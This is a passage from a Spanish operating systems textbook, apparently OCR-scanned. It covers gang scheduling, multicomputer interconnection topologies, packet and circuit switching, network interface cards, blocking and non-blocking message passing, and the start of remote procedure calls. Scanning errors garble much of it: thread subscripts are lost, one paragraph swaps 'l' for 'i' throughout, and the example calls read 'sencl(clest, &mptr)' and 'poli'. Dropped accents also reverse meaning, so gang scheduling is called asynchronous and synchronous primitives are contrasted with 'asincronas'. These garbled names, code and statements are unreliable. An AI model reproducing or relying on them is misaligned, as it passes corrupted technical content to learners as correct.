ta, 1989). De vez en cuando, cada aplicación sondea al servidor central para saber cuántas CPUs 
puede utilizar. Después aumenta o reduce el número de hilos para ajustarse a lo que haya disponi¬ 
ble. Por ejemplo, un servidor Web puede tener 5,10, 20 o cualquier otro número de hilos ejecután¬ 
dose en paralelo. Si en un momento dado tiene 10 hilos, aumenta la demanda de CPUs de manera 
repentina y el servidor Web tiene que reducir su número de hilos a 5, cuando los siguientes 5 hilos 
terminen su trabajo actual, tendrán que dejar de ejecutarse en vez de recibir más trabajo. Este es¬ 
quema permite que los tamaños de las particiones varíen en forma dinámica para adaptarse a la car¬ 
ga de trabajo actual de una mejor forma que el sistema fijo de la figura 8-13. 

Planificación por pandilla 

Una ventaja clara de la compartición de espacio es la eliminación de la multiprogramación, que a 
su vez el i mi na I a sobrecarga i mpuesta por el cambi o de contexto. S i n embargo, una desventaj a tam- 
bién clara es el tiempo que se desperdicia cuando una CPU se bloquea y no tiene nada que hacer 
hasta que vuelva a estar lista. En consecuencia, las personas han buscado algoritmos que intenten 
realizar la planificación tanto en tiempo como en espacio, en especial para los hilos que crean va¬ 
rios hilos, que por lo general se necesitan comunicar entre sí. 
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Para ver el tipo de problema que puede ocurrir cuando los hilos de un proceso se planifican de 
manera independiente, considere un sistema con los hilos Ag y A;^ que pertenecen al proceso A, y 
los hilos Bg y que pertenecen al proceso B. Los hilos Ag y Bg comparten el tiempo en la CPU Ojos 
hilos A;^ y B;^ comparten el tiempo en la CPU 1. Los hilos Ag y A^^ necesitan comunicarse con fre¬ 
cuencia. El patrón de comunicación esqueAg envía un mensaje a A^ y después A;^ envía de regre¬ 
so una respuesta a Ag, seguida de otra secuencia similar. Suponga que Ag y B;^ se inician primero, 
como se muestra en la figura 8-14. 


Hilo Ag en ejecución 



Tiempo O 100 200 300 400 500 600 


Figura 8-14. Comunicación entre dos hilos que pertenecen al hilo A, los cuales se es¬ 
tán ejecutando fuera de fase. 

En el intervalo 0, Ag envía una petición a pero no la recibe sino hasta que se ejecuta en 
el intervalo 1, el cual empieza en los 100 mseg. Envía la respuesta de inmediato, pero Ag no la re¬ 
cibe sino hasta que se vuelve a ejecutar de nuevo, a los 200 mseg. El resultado neto es una secuen¬ 
cia de solicitud-respuesta cada 200 mseg. No es algo muy bueno. 

La solución a este problema es la planificación por pandilla, que es una consecuencia de la 
co-planificación (Ousterhout, 1982). La planificación por pandilla consta de tres partes: 

1. Los grupos de hilos relacionados se programan como una unidad, o pandilla. 

2. Todos los miembros de una plantilla se ejecutan en forma simultánea, en distintas CPUs de 
tiempo compartido. 

3. Todos los miembros de la pandilla inician y terminan sus intervalos en conjunto. 

El truco que hace funcionar la planificación por pandilla es que todas las CPUs se planifican en for¬ 
ma asincrona. Esto significa que el tiempo se divide en quantums discretos, como en la figura 8-14. 
Al inicio de cada nuevo quantum todas las CPUs se reprograman, y se inicia un nuevo hilo en ca¬ 
da CPU .Al inicio del siguiente quantum ocurre otro evento de planificación. En el intervalo no se 
realiza ninguna planificación. Si un hilo se bloquea, su CPU permanece inactiva hasta el final del 
quantum. 

En la figura 8-15 se muestra un ejemplo del funcionamiento de la planificación por pandilla. 
Aquí tenemos un multiprocesador con seis CPUs que son utilizadas por cinco procesos (A a E), con 
un total de 24 hilos listos para ejecutarse. Durante la ranura de tiempo 0, se programan los hilos Ag 
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a Ag y se ejecutan. Durante la ranura de tiempo 1, se programan los hilos Bg, Bj, Cg, C;^ y Cj y 
se ejecutan. Durante la ranura de tiempo 2, se ejecutan los cinco hilos deD y Eg. Los seis hilos res¬ 
tantes que pertenecen al hilo E se ejecutan en la ranura de tiempo 3. Después se repite el ciclo, don¬ 
de la ranura 4 es igual a la ranura 0, y así en lo sucesivo. 
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Figura 8-15. Planificación por pandilla. 


La idea de la planificación por pandilla es que todos los hilos de un hilo se ejecuten en conjun¬ 
to, de manera que si uno de ellos envía una petición a otro, recibirá el mensaje casi de inmediato y 
podrá responder también casi de inmediato. En la figura 8-15, como todos los hilos de A se están 
ejecutando en conjunto, durante un quantum pueden enviar y recibir una gran cantidad de mensa¬ 
jes, con lo cual se elimina el problema de la figura 8-14. 


8.2 MULTICOMPUTADORAS 

Los multiprocesadores son populares y atractivos debido a que ofrecen un modelo de comunica¬ 
ción simple: todas las CPUs comparten una memoria común. Los procesos pueden escribir men¬ 
sajes en la memoria, para que después otros procesos los lean. La sincronización se puede realizar 
mediante el uso de mutexes, semáforos, monitores y otras técnicas bien establecidas. El único con¬ 
tratiempo es la dificultad de construir multiprocesadores grandes, además de que es un proceso 
costoso. 

Para resolver estos problemas se ha investigado mucho sobre las multicomputadoras: CPUs 
con acoplamiento fuerte que no comparten memoria. Cada una tiene su propia memoria, como se 
muestra en la figura 8-l(b). Estos sistemas también son conocidos por una variedad de nombres, in¬ 
cluyendo clúster de computadoras y COWS (Clusters ofWorkstations, Clústeres de estaciones de 
trabajo). 

Es fácil construir las multicomputadoras, ya que el componente básico es una PC que tiene só¬ 
lo los componentes esenciales, además de una tarjeta de interfaz de red de alto rendimiento. Desde 
luego que el secreto para obtener un alto rendimiento es diseñar de manera inteligente la red de in- 
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terconexión y la tarjeta de interfaz. Este problema es completamente análogo al de construir la me¬ 
moria compartida en un multiprocesador. Sin embargo, el objetivo es enviar mensajes en una esca¬ 
la de tiempo en microsegundos, en vez de acceder a la memoria en una escala de tiempo de 
nanosegundos, por lo que es más simple, económico y fácil de lograr. 

En las siguientes secciones, primero analizaremos con brevedad el hardware de una multicompu- 
tadora, en especial el hardware de interconexión. Luego pasaremos al software: empezaremos con 
el software de comunicación de bajo nivel y continuaremos con el de comunicación de alto nivel. 
También analizaremos una manera en que se puede obtener memoria compartida en sistemas que 
no la tienen. Por último examinaremos la planificación y el equilibrio de carga. 

8.2.1 H ardware de una multicomputadora 

El nodo básico de una multicomputadora consiste en una CPU, la memoria, una interfaz de red y 
algunas veces un disco duro. El nodo puede estar empaquetado en un gabinete de PC estándar, pe¬ 
ro el adaptador de gráficos, el monitor, el teclado y el ratón casi nunca están presentes. En algunos 
casos la PC contiene un tablero de multi procesador de 2 o 4 vías, en donde cada nodo posiblemen¬ 
te tiene un chip de doble o cuádruple núcleo en vez de una sola CPU, pero por cuestión de sim¬ 
plicidad vamos a suponer que cada nodo tiene una CPU. A menudo se conectan cientos, o incluso 
miles de nodos entre sí, para formar una multicomputadora. A continuación hablaremos un poco 
acerca de la organización de este hardware. 

Tecnología de interconexión 

Cada nodo tiene una tarjeta de interfaz de red, de la cual salen uno o dos cables (o fibras). Estos ca¬ 
bles se conectan a otros nodos o a switches. En un sistema pequeño, puede haber un switch al que 
están conectados todos los nodos en la topología de estrella de la figura 8-16(a). Las redes Ethernet 
modernas con switches utilizan esta topología. 

Como alternativa al diseño de un solo switch, los nodos pueden formar un anillo con dos ca¬ 
bles que provienen de la tarjeta de interfaz de red: uno que entra al nodo por la izquierda y otro que 
sale del nodo por la derecha, como se muestra en la figura 8-16(b). En esta topología no se necesi¬ 
tan switches, por lo cual no se muestra ninguno. 

La rejiiia o maiia de la figura 8-16(c) es un diseño bidimensional que se ha utilizado en mu¬ 
chos sistemas comerciales. Es muy regular y tiene la facilidad de poder escalar a tamaños mayores. 
Tiene un diámetro, que es la ruta más larga entre dos nodos cualesquiera, y que aumenta sólo con 
base en la raíz cuadrada del número de nodos. Una variante de la malla es el doble toroide de la fi¬ 
gura 8-16(d), una rejilla con los bordes conectados. No sólo es más tolerante a fallas que la rejilla, 
sino que el diámetro es también menor debido a que las esquinas opuestas ahora se pueden comu¬ 
nicar en sólo dos saltos. 

El cubo de la figura 8-16(e) constituye una topología tridimensional regular. Hemos ilustrado 
un cubo de 2 X 2 X 2, pero en el caso más general podría ser un cubo de k x k x k. En la figu¬ 
ra 8-16(f) tenemos un cubo de cuatro dimensiones, construido a partir de dos cubos tridimensiona¬ 
les con los correspondientes nodos conectados. Podríamos hacer un cubo de cinco dimensiones si 
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Figura 8-16. Varias topologías de interconexión, (a) Un solo switch. (b) Un anillo, 
(c) Una rejilla, (d) Un dobel toroide. (e) Un cubo, (f) Un hipercubo 4D. 


clonamos la estructura de la figura 8-16(f) y conectamos los nodos correspondientes, para formar 
un bloque de cuatro cubos. Para obtener seis dimensiones, podríamos duplicar el bloque de cuatro 
cubos e interconectar los nodos correspondientes, y así en lo sucesivo. A un cubo de n dimensiones 
que se forma así se le conoce como hipercubo. M uchas computadoras paralelas utilizan esta topo¬ 
logía debido a que el diámetro aumenta en proporción lineal con las dimensiones. Dicho de otra for¬ 
ma, el diámetro es el logaritmo de base 2 del número de nodos; por ejemplo, un hipercubo de 10 
dimensiones tiene 1024 nodos pero un diámetro de sólo 10, con lo cual se obtienen excelentes pro¬ 
piedades de retraso. Observe que por el contrario, si se organizan 1024 nodos como una rejilla de 
32 X 32 se tendrá un diámetro de 62, lo cual es más de seis veces peor que el hipercubo. La desven¬ 
taja de un diámetro más pequeño es que el factor de salida (fanout) y por ende el número de víncu¬ 
los (y el costo), son mucho mayores para el hipercubo. 

En las multicomputadoras se utilizan dos tipos de esquemas de conmutación. En el primero, 
cada mensaje primero se divide (ya sea que lo haga el usuario o la interfaz de red) en un trozo de 
cierta longitud máxima, conocido como paquete. El esquema de conmutación, conocido como al¬ 
macenamiento de conmutación de paquetes y retransmisión, consiste en inyectar el paquete en 
el primer switch mediante la tarjeta de interfaz de red del nodo de origen, como se muestra en la fi¬ 
gura 8-17(a). Los bits llegan uno a la vez, y cuando llega todo el paqueteen un búfer de entrada, se 
copia a la línea que conduce al siguiente switch a lo largo de la ruta, como se muestra en la figura 
8-17(b). Cuando llega el paquete al switch conectado al nodo de destino, como se muestra en la 
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figura 8-17(c), el paquete se copia a la tarjeta de interfaz de red de ese nodo, y en un momento da¬ 
do también se copia a la RA M . 



Paquete Paquete 

completo completo 


(a) (b) (c) 

Figura 8-17. Almacenamiento de conmutación de paquetes y retransmisión. 

Aunque el almacenamiento de conmutación de paquetes y retransmisión es flexible y eficien¬ 
te, tiene el problema de que la latencia (retraso) aumenta a través de la red de interconexión. Su¬ 
ponga que el tiempo para que un paquete dé un salto en la figura 8-17 esdeT nseg. Como el paquete 
se debe copiar cuatro veces para ir de la CPU 1 a la CPU 2 (de A a C, luego a D y finalmente a la 
CPU de destino), y no se puede iniciar ninguna copia sino hasta que haya terminado la copia ante¬ 
rior, la latencia a través de la red de interconexión es de 4T. Una solución es diseñar una red en la 
que un paquete se pueda dividir lógicamente en unidades más pequeñas. Tan pronto como llega 
la primera unidad a un switch, ésta se puede retransmitir, incluso antes de que haya llegado la par¬ 
te final. Es posible que la unidad llegue a ser tan pequeña como 1 bit. 

El otro régimen de conmutación, conocido como conmutación de circuitos, consiste en que el 
primer switch establece primero una ruta a través de todos los switches, hasta el switch de destino. 
Una vez que se ha establecido esa ruta, los bits se inyectan desde el origen hasta el destino, sin de¬ 
tenerse y con la mayor rapidez posible. No hay búfer en los switches intermedios. La conmutación 
de circuitos requiere una fase de configuración, que requiere cierto tiempo, pero es más rápida una 
vez que se ha completado esta fase. Al enviarse el paquete, la ruta se debe deshacer. Hay una varia¬ 
ción de la conmutación de circuitos, conocida como enrutamiento segmentado (wormhole rou- 
ting), que divide cada paqueteen subpaquetes y permite que el primer subpaquete empiece a fluir, 
incluso antes de que se haya construido la ruta completa. 

I nterfaces de red 

Todos los nodos en una multicomputadora tienen una tarjeta insertadle que contiene la conexión 
del nodo hacia la red de interconexión, la cual mantiene unida toda la multicomputadora. La for¬ 
ma en que están construidas estas tarjetas y la manera en que se conectan a la CPU principal y la 
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RAM tienen consecuencias considerabies para ei sistema operativo. Ahora anaiizaremos breve¬ 
mente aigunas de ias cuestiones reiacionadas. Parte de este materiai se basa en (Bhoedjang, 
2000 ). 

En casi todas ias muiticomputadoras, ia tarjeta de interfaz contiene una cantidad considerabie 
de RAM para contener ios paquetes saiientesy entrantes. Por io generai, un paquete saiiente se tie¬ 
ne que copiar a ia RA M de ia tarjeta de interfaz antes de poder transmitido ai primer switch. La ra¬ 
zón de este diseño es que muchas redes de interconexión son asincronas, por io que una vez que se 
inicia ia transmisión de un paquete, ios bits deben seguir fiuyendo a un ritmo constante. Si ei pa¬ 
quete está en ia RAM principai no se puede garantizar este fiujo continuo hacia ia red, debido ai 
tráfico adicionai en ei bus de memoria. Para eiiminar este probiema se utiiiza una RAM dedicada 
en ia tarjeta de interfaz. Este diseño se muestra en ia figura 8-18. 


Nodo 1 


Nodo 2 



de interfaz 

Figura 8-18. Posición de las tarjetas de interfaz de red en una multicomputadora. 


Con ios paquetes entrantes se produce ei mismo probiema. Los bits iiegan de ia red a una ve¬ 
locidad constante y, a menudo, en extremo aita. Si ia tarjeta de interfaz de red no puede aimacenar- 
ios en tiempo reai a medida que vayan iiegando, se perderán ios datos. Es demasiado riesgoso tratar 
otra vez aquí de pasar por ei bus dei sistema (por ejempio, ei bus PCI) a ia RAM principai. Como 
por io generai ia tarjeta de red se inserta en ei bus PCI, ésta es la única conexión que tiene con la 
RAM principal, por lo que es inevitable competir por este bus con el disco y cualquier otro dispo¬ 
sitivo de E/S. Es más seguro almacenar los paquetes entrantes en la RAM privada de la tarjeta de 
interfaz, y después copiarlos a la RAM principal más adelante. 

La tarjeta de interfaz puede tener uno o más canales de DMA, o incluso puede contener una 
CPU completa (o tal vez hasta varias CPUs). Los canales de DMA pueden copiar los paquetes en¬ 
tre la tarjeta de interfaz y la RAM principal a una velocidad alta, para lo cual solicitan transferen¬ 
cias de bloques en el bus del sistema, y así se transfieren varias palabras sin tener que solicitar el 
bus para cada palabra por separado. Sin embargo, es precisamente por este tipo de transferencia de 
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bloques (que mantiene ocupado el bus del sistema por varios ciclos de bus) que se necesita la RA M 
de la tarjeta de interfaz. 

M uchas tarjetas de interfaz contienen una CPU completa, posiblemente además de uno o más 
canales de DMA. A estas CPU s se les conoce como procesadores de red y se están haciendo ca¬ 
da vez más potentes. Este diseño indica que la CPU principal puede descargar parte de su trabajo 
y pasarlo a la tarjeta de red, como el manejo de una transmisión confiable (en caso de que el hard¬ 
ware subyacente pueda perder paquetes), la multitransmisión (enviar un paquete a más de un des¬ 
tino), la compresión/descompresión, el cifrado/descifrado y el manejo de la protección en un 
sistema con varios procesos. Sin embargo, tener dos CPU s significa que deben estar sincronizadas 
para evitar condiciones de competencia, lo cual agrega más sobrecarga y más trabajo para el sis¬ 
tema operativo. 


8.2.2 Software de comunicación de bajo nivel 

El enemigo de la comunicación de alto rendimiento en los sistemas de multicomputadora es el co¬ 
piado de paquetes en exceso. En el mejor caso, habrá una copia de la RAM a la tarjeta de interfaz 
en el nodo de origen, una copia de la tarjeta de interfaz de origen a la tarjeta de interfaz de destino 
(si no hay almacenamiento y retransmisión a lo largo de la ruta), y una copia de ahí a la RAM de 
destino: un total de tres copias. Sin embargo, en muchos sistemas es aún peor. En especial, si la tar¬ 
jeta de interfaz está asignada al espacio de direcciones virtuales del kernel y no al espacio de direc¬ 
ciones virtuales de usuario, un proceso de usuario sólo puede enviar un paquete si emite una 
llamada al sistema que se atrape en el kernel. Tal vez los kerneis tengan que copiar los paquetes a 
su propia memoria, tanto en la entrada como en la salida: por ejemplo, para evitar los fallos de pá¬ 
gina mientras transmiten por la red. Además, el kernel receptor tal vez no sepa en dónde debe co¬ 
locar los paquetes entrantes sino hasta que haya tenido la oportunidad de examinarlos. Estos cinco 
pasos de copia se ilustran en la figura 8-18. 

Si las copias que van hacia la RAM y que provienen de ella son el cuello de botella, las copias 
adicionales hacia/desde el kernel pueden duplicar el retraso de un extremo al otro, y reducir la tasa 
de transferencia a la mitad. Para evitar este impacto en el rendimiento, muchas multicomputadoras 
asignan la tarjeta de interfaz directamente al espacio de usuario y permiten que el proceso de usua¬ 
rio coloquen los paquetes en la tarjeta directamente, sin que el kernel se involucre. Aunque en de¬ 
finitiva este método ayuda al rendimiento, introduce dos problemas. 

En primer lugar, ¿qué tal si hay varios procesos en ejecución en el nodo y necesitan acceso a 
la red para enviar paquetes? ¿Cuál obtiene la tarjeta de interfaz en su espacio de direcciones? Es 
problemático hacer una llamada al sistema para asignar la tarjeta y desasignarla de un espacio de 
direcciones virtuales, pero si sólo un proceso obtiene la tarjeta, ¿cómo envían paquetes los demás 
procesos? ¿Y qué ocurre si la tarjeta está asignada al espacio de direcciones virtuales del proceso A 
y llega un paquete para el proceso B, en especial si A y B tienen distintos propietarios, ninguno de 
los cuales desea hacer un esfuerzo por ayudar al otro? 

Una solución es asignar la tarjeta de interfaz a todos los procesos que la necesitan, pero enton¬ 
ces se requiere un mecanismo para evitar condiciones de competencia. Por ejemplo, si A reclama 
un búfer en la tarjeta de interfaz y después, debido a un intervalo, se ejecuta B y reclama el mismo 
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búfer, se produce un desastre. Se necesita algún tipo de mecanismo de sincronización, pero estos 
mecanismos (como los mutexes) sólo funcionan cuando se asume que los procesos van a cooperar. 
En un entorno de tiempo compartido con varios usuarios, en donde todos tienen prisa por realizar 
su trabajo, tal vez un usuario podría bloquear el mutex asociado con la tarjeta y nunca liberarlo. La 
conclusión aquí es que el proceso de asignar la tarjeta de interfaz al espacio de usuario funciona 
bien nada más cuando hay un solo proceso de usuario en ejecución en cada nodo, a menos que se 
tomen precauciones especiales (por ejemplo, que distintos procesos asignen distintas porciones de 
la RAM de la interfaz a sus espacios de direcciones). 

El segundo problema es que tal vez el kernel necesite acceso a la red de interconexión en sí, 
por ejemplo, para acceder al sistema de archivos en un nodo remoto. No es conveniente que el ker¬ 
nel comparta la tarjeta de interfaz con los usuarios, ni siquiera cuando hay tiempo compartido. Su¬ 
ponga que mientras se asigna la tarjeta al espacio de usuario llega un paquete del kernel. O suponga 
que el proceso de usuario envió un paquete a una máquina remota, pretendiendo ser el kernel. La 
conclusión es que el diseño más simple es tener dos tarjetas de interfaz de red, una asignada al es¬ 
pacio de usuario para el tráfico de las aplicaciones, y la otra asignada al espacio del kernel para que 
la utilice el sistema operativo. M uchas multicomputadoras hacen precisamente esto. 


I nterfaz de comunicación de nodo a red 

Otra de las cuestiones es cómo llevar los paquetes a la interfaz de red. La manera más rápida es 
utilizar el chip de DMA en la tarjeta sólo para copiar los paquetes de la RAM . El problema con 
este método es que el DMA utiliza direcciones físicas en vez de virtuales, y se ejecuta de mane¬ 
ra independiente a la CPU. Para empezar, aunque sin duda un proceso de usuario conoce la 
dirección virtual de cada paquete que desea enviar, por lo general no conoce la dirección física. 
No es conveniente hacer una llamada al sistema para realizar la asignación de dirección virtual 
a dirección física, ya que el objetivo de colocar la tarjeta de interfaz en espacio de usuario en pri¬ 
mer lugar era para evitar tener que hacer una llamada al sistema para cada paquete que se va 
a enviar. 

Además, si el sistema operativo decide sustituir una página mientras el chipdeDMA copia un 
paquete de esta página, se transmitirán los datos incorrectos. Peor aún, si el sistema operativo sus¬ 
tituye una página mientras el chip de DMA copia un paquete entrante a esta página, no sólo se per¬ 
derá el paquete entrante, sino que se arruinará también una página de memoria inocente. 

Para evitar estos problemas hay que hacer llamadas al sistema con el fin de marcar y desmar¬ 
car páginas en la memoria, marcándolas para indicar que no se pueden paginar temporalmente. Sin 
embargo, es muy problemático tener que hacer una llamada al sistema para marcar la página que 
contenga cada uno de los paquetes salientes y después tener que hacer otra llamada para desmar¬ 
carla. Si los paquetes son pequeños (por ejemplo, de 64 bytes o menores), la sobrecarga por marcar 
y desmarcar cada búfer es demasiado alta. Para paquetes grandes (por ejemplo, de 1 K B o más) pue¬ 
de ser tolerable. Para los tamaños i ntermedios, depende délos detal les del hardware. A demás de im¬ 
pactar en el rendimiento, el proceso de marcar y desmarcar páginas hace que el software sea más 
complejo. 
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8.2.3 Software de comunicación a nivel de usuario 

Para comunicarse, los procesos en distintas CPU sen una multicomputadora se envían mensajes en¬ 
tre sí. En su forma más simple, este proceso de paso de mensajes está expuesto para los procesos 
de usuario. En otras palabras, el sistema operativo proporciona la forma de enviar y recibir mensa¬ 
jes, y los procedimientos de biblioteca hacen que estas llamadas subyacentes estén disponibles pa¬ 
ra los procesos de usuario. En una forma más sofisticada, el proceso actual para el paso de mensajes 
está oculto de los usuarios, al hacer que la comunicación remota sea como una llamada a un proce¬ 
dimiento. A continuación estudiaremos ambos métodos. 

Enviar y recibir 

En su mínima expresión, los servicios de comunicación que se proporcionen se pueden reducir a 
dos llamadas (de biblioteca), una para enviar mensajes y otra para recibirlos. La llamada para en¬ 
viar un mensaje podría ser 

sencl(clest, &mptr); 

y la llamada para recibir un mensaje podría ser 
receive(clirec, &mptr); 

La primera llamada envía el mensaje al que apunta mptr a un proceso identificado por dest, y hace 
que el proceso que hizo la llamada se bloquee hasta que se haya enviado el mensaje. La segunda 
llamada hace que el proceso que hizo la llamada se bloquee hasta que llegue un mensaje. Cuando 
pasa esto, el mensaje se copia al búfer al que apunta mptr y el proceso que hizo la llamada se des¬ 
bloquea. El parámetro direc especifica la dirección en la que el receptor está escuchando. Hay mu¬ 
chas variantes posibles de estos dos procedimientos y sus parámetros. 

Una de las cuestiones es cómo se realiza el direccionamiento. Como las multicomputadorasson 
estáticas, con un número fijo de CPUs, la manera más sencilla de manejar el direccionamiento es 
hacer que addr sea una dirección compuesta por dos partes: un número de CPU y un número de 
proceso o de puerto en la CPU direccionada. De esta forma, cada CPU puede administrar sus pro¬ 
pias direcciones sin conflictos potenciales. 

Comparación entre llamadas con bloqueo y sin bloqueo 

Las llamadas antes descritas son llamadas con bloqueo (que algunas veces se les conoce como lla¬ 
madas síncronas). Cuando un proceso llama a send, especifica un destino y un búfer para enviar¬ 
lo a ese destino. M ientras se está enviando el mensaje, el proceso emisor se bloquea (es decir, se 
suspende). La instrucción que sigue a la llamada a send no se ejecuta sino hasta que el mensaje 
se haya enviado por completo, como se muestra en la figura 8-19(a). De manera similar, una llamada 
a receive no devuelve el control sino hasta que se haya recibido en realidad un mensaje y se haya 
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colocado en el búfer al que apunta el parámetro. El proceso permanece suspendido en receive has¬ 
ta que llega un mensaje, aunque tarde horas en llegar. En algunos sistemas, el receptor puede espe¬ 
cificar de qué proceso desea recibir, en cuyo caso permanece bloqueado hasta que llega un mensaje 
de ese emisor. 


Emisor en ejecución I"* Emisor bloqueado 

, ,Se atrapa en el kernel, 

' se bloquea el emisor 

|-«-El mensaje se está enviando 

(a) 


Emisor en ejecución 


Regresa del kernel, 
se libera el emisor 


Emisor 

I bloqueado 
Emisor en ejecución I"* * 

, ,Se atrapa 

I-*--El mensaje se está enviando-►! 

El mensaje 
se copia en 
un búfer del kernel 

(b) 

Figura 8-19. (a) U na llamada de envío con bloqueo, (b) U na llamada de envío sin blo¬ 
queo. 

Una alternativa para las llamadas con bloqueo es el uso de llamadas sin bloqueo (a las que al¬ 
gunas veces se les conoce como llamadas asincronas). Si send es sin bloqueo, devuelve de inme¬ 
diato el control al proceso que hizo la llamada, antes de enviar el mensaje. La ventaja de este 
esquema es que el proceso emisor puede seguir operando en paralelo con la transmisión del men¬ 
saje, en vez de que la CPU quede inactiva (suponiendo que no se pueda ejecutar ningún otro pro¬ 
ceso). Por lo general, los diseñadores del sistema son los que eligen utilizar primitivas con bloqueo 
o sin bloqueo (es decir, sólo hay disponible una de las dos primitivas), aunque en unos cuantos sis¬ 
temas están disponibles ambas primitivas, y los usuarios pueden elegir su favorita. 

Sin embargo, la ventaja de rendimiento que ofrecen las primitivas sin bloqueo es contrarresta¬ 
da por una seria desventaja: el emisor no puede modificar el búfer del mensaje sino hasta que éste 
se haya enviado. Las consecuencias de que el proceso sobrescriba el mensaje durante la transmisión 
son demasiado horribles como para contemplarlas. Peor aún, el proceso emisor no tiene idea de 
cuándo terminará la transmisión, por lo que nunca sabrá cuándo es seguro volver a utilizar el búfer. 
Es muy difícil que pueda evitar usarlo de manera indefinida. 

Hay tres posibles soluciones. La primera es hacer que el kernel copie el mensaje a un búfer in¬ 
terno del kernel y que después permita que continúe el proceso, como se muestra en la figura 8-19(b). 


Emisor en ejecución 


Regresa 
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Desde el punto de vista del emisor, este esquema es igual que una llamada con bloqueo: tan pronto 
como recibe el control devuelta, puede reutilizar el búfer. Desde luego que el mensaje todavía no se 
habrá enviado, pero al emisor no le estorba este hecho. La desventaja de este método es que cada 
mensaje saliente tiene que copiarse del espacio de usuario al espacio del kernel. Con muchas inter¬ 
faces de red, el mensaje se tendrá que copiar posteriormente a un búfer de transmisión de hardware 
de todas formas, por lo que básicamente se desperdicia la primera copia. La copia adicional puede 
reducir el rendimiento del sistema en forma considerable. 

La segunda solución es interrumpir al emisor cuando se haya enviado el mensaje por comple¬ 
to, para informarle que el búfer está disponible otra vez. En este caso no se requiere copia, lo cual 
ahorra tiempo, pero las interrupciones a nivel de usuario hacen que la programación sea engañosa, 
difícil y que esté sujeta a condiciones de competencia, lo que las hace irreproduciblesy casi impo¬ 
sibles de depurar. 

La tercera solución es hacer que el búfer copie al escribir; es decir, se marca como de sólo lec¬ 
tura hasta que se haya enviado el mensaje. Si el búfer se vuelve a utilizar antes de enviar el mensa¬ 
je, se obtiene una copia. El problema con esta solución es que, a menos que el búfer esté aislado en 
su propia página, las escrituras de las variables cercanas obligarán a que se obtenga una copia. Ade¬ 
más se requiere una administración adicional, debido a que el hecho de enviar un mensaje ahora 
afecta de manera implícita al estado de lectura/escritura de la página. Por último, tarde o temprano 
es probable que se vuelva a escribir en la página, con lo cual se activará una copia que tal vez ya 
no sea necesaria. 

En consecuencia, las opciones en el lado emisor son: 

1. Envío con bloqueo (la CPU queda inactiva durante la transmisión del mensaje). 

2. Envío sin bloqueo con copia (se desperdicia el tiempo de la CPU por la copia adicional). 

3. Envío sin bloqueo con interrupción (dificulta la programación). 

4. Copia al escribir (probablemente se requiera una copia adicional en un momento dado). 

Bajo condiciones normales, la primera opción es la mejor, en especial si hay varios hilos disponi¬ 
bles, para que mientras un hilo se bloquee tratando de enviar, los demás hilos puedan continuar su 
trabajo. Además, no se requiere la administración de búferes del kernel. Lo que es más, como se 
puede ver al comparar la figura 8-19(a) con la figura 8-19(b), por lo general el mensaje saldrá con 
más rapidez si no se requiere una copia. 

Para que conste, nos gustaría recalcar que algunos autores utilizan un criterio distinto para di¬ 
ferenciar las primitivas asincronas de las asincronas. En la opinión alternativa, una llamada es sín¬ 
crona sólo si el emisor se bloquea hasta que se haya recibido el mensaje y se haya enviado un 
reconocimiento de vuelta (Andrews, 1991). En el mundo de la comunicación en tiempo real, la pa¬ 
labra "síncrona" tiene otro significado, que por desgracia puede provocar una confusión. 

Tanto send como receive pueden ser con bloqueo o sin bloqueo. Una llamada con bloqueo só¬ 
lo suspende al emisor hasta que haya llegado un mensaje. Si hay varios hilos disponibles, éste es un 
método simple. De manera alternativa, una llamada receive sin bloqueo sólo indica al kernel en dónde 
está el búfer, y devuelve el control casi de inmediato. Se puede utilizar una interrupción para indi¬ 
car que ha llegado un mensaje. Sin embargo, las interrupciones son difíciles de programar además 
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de ser muy lentas, por lo que tal vez sea preferible que el receptor real i ce sondeos en busca de men¬ 
sajes entrantes mediante el uso de un procedimiento (poli) que indique si hay mensajes en espera. 
De ser así, el emisor puede llamar a get_message, que devuelve el primer mensaje que haya llega¬ 
do. En algunos sistemas, el compilador puede insertar llamadas de sondeo en el código en lugares 
apropiados, aunque es difícil saber con qué frecuencia hay que sondear. 

Otra opción más es un esquema en el que la llegada de un mensaje provoca la creación de un 
nuevo hilo de manera espontánea, en el espacio de direcciones del proceso receptor. A dicho hilo se 
le conoce como hilo emergente. Este hilo ejecuta un procedimiento que se especifica por adelan¬ 
tado y cuyo parámetro es un apuntador al mensaje entrante. Después de procesar el mensaje, sim¬ 
plemente termina y se destruye de manera automática. 

Una vari ante de esta i dea es ejecutar el código del receptor directamente en el manejador de in¬ 
terrupciones, para evitar la dificultad de crear un hilo emergente. Para que este esquema sea aún 
más rápido, el mensaje en sí contiene la dirección del manejador, para que cuando llegue un men¬ 
saje se pueda llamar al manejador con unas cuantas instrucciones. La gran ventaja aquí es que no 
se necesita ningún tipo de copia. El manejador recibe el mensaje de la tarjeta de interfaz y lo pro¬ 
cesa al instante. A este esquema se le conoce como mensajes activos (Von Eicken y colaboradores, 
1992). Como cada mensaje contiene la dirección del manejador, los mensajes activos sólo funcio¬ 
nan cuando los emisores y receptores confían entre sí por completo. 

8.2.4 L lamada a procedimiento remoto 

Aunque el modelo de paso de mensajes ofrece una manera conveniente de estructurar un sistema 
operativo de multicomputadora, tiene una falla incorregible: el paradigma básico sobre el que se ba¬ 
sa toda la comunicación es la entrada/salida. En esencia, los procedimientos send y receive se dedi¬ 
can a realizar operaciones de E/S, y muchas personas creen que la E/S es el modelo de programación 
incorrecto. 

Este problema se conoce desde hace mucho tiempo, pero no se había hecho mucho al respec¬ 
to sino hasta que Birrel y Nelson (1984) escribieron un artículo en el que introdujeron una forma 
completamente distinta de atacarlo. Aunque la idea es gratificante y simple (ya que alguien pensó 
en ella), a menudo las implicaciones son sutiles. En esta sección examinaremos el concepto, su im- 
plementación, sus puntos fuertes y sus puntos débiles. 

En resumen, lo que Birrell y Nelson sugirieron fue permitir que los programas llamen a los pro¬ 
cedimientos que se encuentran en otras CPUs. Cuando un proceso en la máquina 1 llama a un proce¬ 
dimiento en la máquina 2, el proceso que hizo la llamada en la máquina 1 se suspende, y se lleva a 
cabo la ejecución del procedimiento al que llamó en la máquina 2. La información se puede transpor¬ 
tar del proceso que hizo la llamada al procedimiento que llamó mediante los parámetros, y puede de¬ 
volverse en el resultado del procedimiento. El programador no puede ver el paso de mensajes ni las 
operaciones de E/S. A esta técnica se le conoce como RPC (Remóte Procedure Cali, Llamada a pro¬ 
cedimiento remoto) y se ha convertido en la base de una gran cantidad de software de multicomputa¬ 
dora. Por tradición, el procedimiento que hace la llamada se denomina cliente y el procedimiento al 
que se llamó se denomina servidor; en este libro también utilizaremos esos nombres. 

